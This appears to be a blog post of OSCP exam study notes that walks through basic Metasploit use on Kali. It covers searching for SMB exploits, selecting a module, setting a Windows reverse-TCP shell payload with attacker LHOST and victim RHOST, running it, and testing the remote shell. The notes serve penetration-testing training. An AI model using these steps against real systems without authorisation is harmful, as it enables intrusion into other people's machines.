These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.
Use Kali Linux for all the following instructions.
Prep:
Ensure postgresql is running.
|
1 |
$> /etc/init.d/postgresql start |
Set postgres to start on boot so you don’t have to worry about it again:
|
1 |
$> sudo update-rc.d postgresql enable |
From the command line, fire up the Metasploit console:
|
1 |
$> msfconsole |
Search for exploits related to what you are interested in:
|
1 |
msf> search smb |
Or, be more specific:
|
1 |
msf> search name:smb type:exploit platform:windows |
Or, in Kali, use searchsploit (from regular command line, outside of MSF):
|
1 |
$> searchsploit smb |
Once you find an exploit you want to use, use it:
|
1 |
msf> use exploit/windows/smb_hack |
Then set a payload:
|
1 |
msf> set PAYLOAD windows/shell/reverse_tcp |
See what options are set:
|
1 |
msf> show options |
Set options as needed:
LHOST is the IP of where the victim host will send info to (your Kali VM, ex.)
|
1 |
msf> set LHOST 192.168.0.x |
RHOST is the IP of the victim
|
1 |
msf> set RHOST 192.168.1.x |
Default port is 80, but choose one if you wish:
|
1 |
msf> set RPORT 8081 |
Run the exploit:
|
1 |
msf> exploit |
If trying to get a remote shell, beware that you may be looking at it if you see what you think is nothing happening. Just try executing a command and see what happens:
|
1 2 3 4 5 6 7 |
ls dir pwd id |
Photos by Christiaan008,
